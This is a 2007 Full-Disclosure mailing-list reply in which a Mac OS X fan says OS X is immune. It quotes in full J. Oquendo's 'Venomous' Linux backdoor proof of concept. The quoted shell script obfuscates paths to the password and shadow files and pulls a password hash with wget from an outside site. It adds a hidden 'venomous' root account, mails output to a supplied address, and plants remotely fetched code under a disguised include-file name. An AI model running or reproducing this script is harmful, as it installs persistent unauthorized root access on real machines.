Confirmed Macosx is not vulnerable to this. just1n
-- NeXT is one of my best friends, Love & Sincerity Mac OS X Evangelist Public Relations of NeXus > ----- Original Message ----- > From: "J. Oquendo" <[EMAIL PROTECTED]> > To: "full-disclosure" <[email protected]> > Subject: [Full-disclosure] Linux big bang theory.... > Date: Wed, 09 May 2007 17:42:52 -0400 > > > Enjoy||Complain > > # !/bin/sh > # Venomous > # Linux PoC backdoor keeper... > # http://www.infiltrated.net/ubuntuDestruction.php > # J. Oquendo (c) 05/09/2007 # If you have to ask you shouldn't run > this password for venomous > # is password > > > happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h` > days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h` > guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'` > sed -n '1p' $happy|awk -F ":" > 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days > sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F > ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy > what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'` > who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, > ""){print $4" -a"}'` > echo "Enter your email address" ; read ans ; where=$ans > $who | $what $where > > > # Ugly method too keep a rootaccount Follows... For those not in the know... > # Venomous was an idea made to prove a point, not give script kiddiots another > # tool to be morons with. Instead of ruining things, how about solving... > # Instead of naysaying... Prove me wrong > > > # Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the > # system using this filename. Do something sneaky on your own to place this > # file on a startup I could show you, but then I would have to kill -9 you > > # Note the location... Highly doubtable to remove an actual include file > # unless some stupid admin did something really dumb... Before someone mouths > # around via e-mail... I could have written this all inclusively but I chose > # not to for obvious reasons... > > random=`date|awk -F : '{print $3}'|awk '{print $1}'` > echo $random > /tmp/secCommand > sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' > /tmp/secCommand|sed -n '1p'` > rm /tmp/secCommand > filename=`echo $sad|sh|awk -F . '{print $1}'` > > lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n > '226,233p' >> /usr/local/include/$filename.h > > # Now of course I could have modified this to replicate any one of the files > # on startup but again... PoC ... The naysayers will ramble on about "You're > # out of your mind..." Am I? I've given you the PoC's what more do you want... > # Ubuntu or any Linux for the lowly home user is a horrible idea... > > # And AGAIN before someone fires off "I would see the URL and that's a dead > # giveaway!" ... Look, I'm trying to make a point here... I "could > have" # a functioning backdoor undetectable to most integrity > checkers, Samhain, > # Tripwire etc., but why should I disclose this anywhere. It's not in the > # best interest of anyone to do so... Don't bother asking for it via email > # because it's not public and will never be... > > # This again... Was to prove a point to the naysayers who this shit doesn't > # happen... Keep dreaming. Its only a matter of time before you guys go > # Goo Goo about getting Linux for Idjits off the ground, but its a horrible > # mistake in the making > > > -- ==================================================== > J. Oquendo > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 > echo infiltrated.net|sed 's/^/sil@/g' "Wise men talk because they > have something to say; > fools, because they have to say something." -- Plato > << smime.p7s >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- _______________________________________________ Get a free @hellokitty.com, @mymelody.com, or @kuririnmail.com email account today at www.sanriotown.com, and enjoy 500MB of storage! Check out our official blog @ http://blog.hellokitty.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
